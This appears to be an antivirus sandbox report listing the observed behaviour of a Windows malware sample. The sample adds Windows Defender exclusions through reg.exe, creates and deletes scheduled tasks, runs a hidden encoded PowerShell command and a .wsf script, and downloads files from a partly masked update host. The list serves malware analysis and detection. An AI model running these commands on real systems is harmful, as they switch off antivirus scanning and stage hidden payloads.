Technical Information
- <SYSTEM32>\tasks\gegwwokxf
- Windows Defender
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\BqeSnNShU' = '0'
- [HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\BqeSnNShU' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\FuOvEdCVQSMU2' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\SpxblGFlJmbSdphOWAR' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\SpxblGFlJmbSdphOWAR' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\FuOvEdCVQSMU2' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\BqeSnNShU' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XjhyZzwkXSWyC' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lSJHxSrgcIUn' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\cVeyZFosQjUGhzVB' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\cVeyZFosQjUGhzVB' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\ubakgNfKrGKxtiSJc' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lSJHxSrgcIUn' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XjhyZzwkXSWyC' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\ubakgNfKrGKxtiSJc' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\cVeyZFosQjUGhzVB' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lSJHxSrgcIUn' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\SpxblGFlJmbSdphOWAR' = '0'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XjhyZzwkXSWyC' = '0'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\lSJHxSrgcIUn' = '0'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\cVeyZFosQjUGhzVB' = '0'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions' = '0'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\ubakgNfKrGKxtiSJc' = '0'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\FuOvEdCVQSMU2' = '0'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\bZRyuwsfBmzQBEkO' = '0'
- [HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\bZRyuwsfBmzQBEkO' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\bZRyuwsfBmzQBEkO' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\BqeSnNShU' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\FuOvEdCVQSMU2' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\SpxblGFlJmbSdphOWAR' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\XjhyZzwkXSWyC' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\bZRyuwsfBmzQBEkO' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions' = '00000000'
- [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\ubakgNfKrGKxtiSJc' = '00000000'
- '%WINDIR%\temp\bdxxckngchqkkktj\eeugjb.exe' /S /UPDATE
- %WINDIR%\temp\bdxxckngchqkkktj\eeugjb.exe
- <SYSTEM32>\grouppolicy\machine\registry.pol
- <SYSTEM32>\grouppolicy\gpt.ini
- %HOMEPATH%\ntuser.pol
- %ALLUSERSPROFILE%\ntuser.pol
- %WINDIR%\temp\bzryuwsfbmzqbeko\urcxxtji\chxrmughzcuybayu.wsf
- <SYSTEM32>\tasks\gegwwokxf
- %WINDIR%\temp\bzryuwsfbmzqbeko\urcxxtji\chxrmughzcuybayu.wsf
- 'ra#####lestorage.com':80
- http://www.ra#####lestorage.com/updates/ya/wrtzr_ytab_a_1/win/version.txt
- http://www.ra#####lestorage.com/updates/ya/wrtzr_ytab_a_1/win/update_e.jpg
- DNS ASK ra#####lestorage.com
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\Temp\bZRyuwsfBmzQBEkO\UrCxxtji\ChXrmUGHzCUYbayU.wsf"
- '<SYSTEM32>\gpupdate.exe' /force' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "geGwWOkxF" /SC once /ST 09:59:13 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZ...
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ETHCvuYuBZTsGMzfv2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ETHCvuYuBZTsGMzfv"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ETHCvuYuBZTsGMzfv"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "sfKeiZJsFgRBVIlub2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "sfKeiZJsFgRBVIlub2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "sfKeiZJsFgRBVIlub"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "sfKeiZJsFgRBVIlub"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "OYcPTLlDjTFIWTGDV2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "OYcPTLlDjTFIWTGDV2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "OYcPTLlDjTFIWTGDV"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "OYcPTLlDjTFIWTGDV"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "PbAoaitAcVmrZdMZT2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "PbAoaitAcVmrZdMZT2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "PbAoaitAcVmrZdMZT"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "PbAoaitAcVmrZdMZT"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "gZDSmahObpUMrbrDe2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gZDSmahObpUMrbrDe2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ETHCvuYuBZTsGMzfv2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "TptipRkaADsnYEWUp"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "GsdRGwMmyeFDUIVQS"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WhVVJMIcDxYjghtsB2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "WhVVJMIcDxYjghtsB2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WhVVJMIcDxYjghtsB"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "WhVVJMIcDxYjghtsB"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ecYUkwtZZwvIpbOAE2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ecYUkwtZZwvIpbOAE2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ecYUkwtZZwvIpbOAE"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "GsdRGwMmyeFDUIVQS2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qbicFMnGcIAusdatr2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qbicFMnGcIAusdatr2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qbicFMnGcIAusdatr"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qbicFMnGcIAusdatr"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "TptipRkaADsnYEWUp2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "TptipRkaADsnYEWUp2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "TptipRkaADsnYEWUp"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ecYUkwtZZwvIpbOAE"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "GsdRGwMmyeFDUIVQS"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "LOkDIVpiprSDLZJYF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "gZDSmahObpUMrbrDe"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HUuHtxagFlasSCgww2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HUuHtxagFlasSCgww"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HUuHtxagFlasSCgww"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kKoqDDgXrlHgbNeGM2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "kKoqDDgXrlHgbNeGM2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kKoqDDgXrlHgbNeGM"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "kKoqDDgXrlHgbNeGM"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "JbsaDtOILYXRFfaUb2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "JbsaDtOILYXRFfaUb2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "JbsaDtOILYXRFfaUb"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "JbsaDtOILYXRFfaUb"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "xSGxSzSfjTiLSiCVv2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "xSGxSzSfjTiLSiCVv2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "xSGxSzSfjTiLSiCVv"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HUuHtxagFlasSCgww2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gZDSmahObpUMrbrDe"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CdrqiQsBcjWtPKMJF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "CdrqiQsBcjWtPKMJF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CdrqiQsBcjWtPKMJF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "LOkDIVpiprSDLZJYF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "LOkDIVpiprSDLZJYF"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pcjNDlOKLdbzMTfdv2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pcjNDlOKLdbzMTfdv2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pcjNDlOKLdbzMTfdv"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pcjNDlOKLdbzMTfdv"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qWVfwggDdJjEdZtiy2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qWVfwggDdJjEdZtiy2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qWVfwggDdJjEdZtiy"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qWVfwggDdJjEdZtiy"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "mIfALinMYUnUUzFwY2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "mIfALinMYUnUUzFwY2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "mIfALinMYUnUUzFwY"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "mIfALinMYUnUUzFwY"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "LOkDIVpiprSDLZJYF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cmteRgqDhvlWKuAxY2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "GsdRGwMmyeFDUIVQS2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cmLJFKVCihpuDBmWi2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "uFykPWHZvEteQBwhi2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cmLJFKVCihpuDBmWi"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cmLJFKVCihpuDBmWi"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qLteGRbATqEgMoDzo2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qLteGRbATqEgMoDzo2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qLteGRbATqEgMoDzo"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qLteGRbATqEgMoDzo"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cCVOhrdiyDdxGwLJm2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cCVOhrdiyDdxGwLJm2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cCVOhrdiyDdxGwLJm"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cCVOhrdiyDdxGwLJm"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EHpegRuyAZSCYbcXB2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "EHpegRuyAZSCYbcXB2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EHpegRuyAZSCYbcXB"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "EHpegRuyAZSCYbcXB"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "MOtIHFntOQLbVMPfw"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cmLJFKVCihpuDBmWi2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "MOtIHFntOQLbVMPfw2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "uFykPWHZvEteQBwhi2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "fxOgmTGKQQFjjFtehKw"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "prpHrkiYcMohGmyVk2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "prpHrkiYcMohGmyVk2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "prpHrkiYcMohGmyVk"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "prpHrkiYcMohGmyVk"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wBXbALvWUOSFDshnC2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wBXbALvWUOSFDshnC2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wBXbALvWUOSFDshnC"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "PbCmMGAxJYOnaGxOo"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wYlXoNxjYjoYItewV2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wYlXoNxjYjoYItewV2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wYlXoNxjYjoYItewV"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wYlXoNxjYjoYItewV"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "MOtIHFntOQLbVMPfw2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "MOtIHFntOQLbVMPfw"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "fxOgmTGKQQFjjFtehKw"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "uFykPWHZvEteQBwhi"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "uFykPWHZvEteQBwhi"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kEJTwGwncsvYawXSe2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kEJTwGwncsvYawXSe"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "kEJTwGwncsvYawXSe"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NjBRSvbpQtXNmBKWF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "NjBRSvbpQtXNmBKWF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NjBRSvbpQtXNmBKWF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "NjBRSvbpQtXNmBKWF"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HRCzZirkPHqIlfwgR2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HRCzZirkPHqIlfwgR2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HRCzZirkPHqIlfwgR"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HRCzZirkPHqIlfwgR"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "PbCmMGAxJYOnaGxOo2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "PbCmMGAxJYOnaGxOo2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "PbCmMGAxJYOnaGxOo"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "WnDYeVlnMdKSUKKYq"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WnDYeVlnMdKSUKKYq"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "WnDYeVlnMdKSUKKYq2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "kEJTwGwncsvYawXSe2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WnDYeVlnMdKSUKKYq2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "fYWYqVBvXLiobEaqM2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "fYWYqVBvXLiobEaqM2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "fYWYqVBvXLiobEaqM"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "fYWYqVBvXLiobEaqM"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "QtyghneddveCvubzK2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "QtyghneddveCvubzK2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "QtyghneddveCvubzK"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "xSGxSzSfjTiLSiCVv"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "CdrqiQsBcjWtPKMJF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "QtyghneddveCvubzK"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "FFQxaoyhJymmoflDQ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "FFQxaoyhJymmoflDQ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ugvLkNAIBYdzZGudn2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ugvLkNAIBYdzZGudn2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ugvLkNAIBYdzZGudn"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ugvLkNAIBYdzZGudn"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "FFQxaoyhJymmoflDQ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "FFQxaoyhJymmoflDQ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HphFjGMtNmlzDvGHx2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HphFjGMtNmlzDvGHx2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HphFjGMtNmlzDvGHx"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\SpxblGFlJmbSdphOWAR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HEHDyzlXLzKhNAFaL2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HEHDyzlXLzKhNAFaL2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HEHDyzlXLzKhNAFaL"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HEHDyzlXLzKhNAFaL"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\ubakgNfKrGKxtiSJc" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\ubakgNfKrGKxtiSJc" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\cVeyZFosQjUGhzVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\cVeyZFosQjUGhzVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lSJHxSrgcIUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lSJHxSrgcIUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XjhyZzwkXSWyC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XjhyZzwkXSWyC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\FuOvEdCVQSMU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ikqYUfzVWWDggQINN"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ikqYUfzVWWDggQINN2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ikqYUfzVWWDggQINN2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KswMbliNkNTDQBwjM"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "oFubAsSTOkqasbedp2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "oFubAsSTOkqasbedp"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "oFubAsSTOkqasbedp"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "LVIrYhhQPYnLijcUF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "LVIrYhhQPYnLijcUF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "LVIrYhhQPYnLijcUF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "LVIrYhhQPYnLijcUF"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "hFVSwPPhvaWOfhApX2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "hFVSwPPhvaWOfhApX2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "hFVSwPPhvaWOfhApX"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "hFVSwPPhvaWOfhApX"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KswMbliNkNTDQBwjM2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KswMbliNkNTDQBwjM2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KswMbliNkNTDQBwjM"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "oFubAsSTOkqasbedp2"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\SpxblGFlJmbSdphOWAR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\FuOvEdCVQSMU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lSJHxSrgcIUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\bZRyuwsfBmzQBEkO" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\bZRyuwsfBmzQBEkO" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\bZRyuwsfBmzQBEkO" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\bZRyuwsfBmzQBEkO" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\bZRyuwsfBmzQBEkO" /t REG_DWORD /d 0 /reg:64
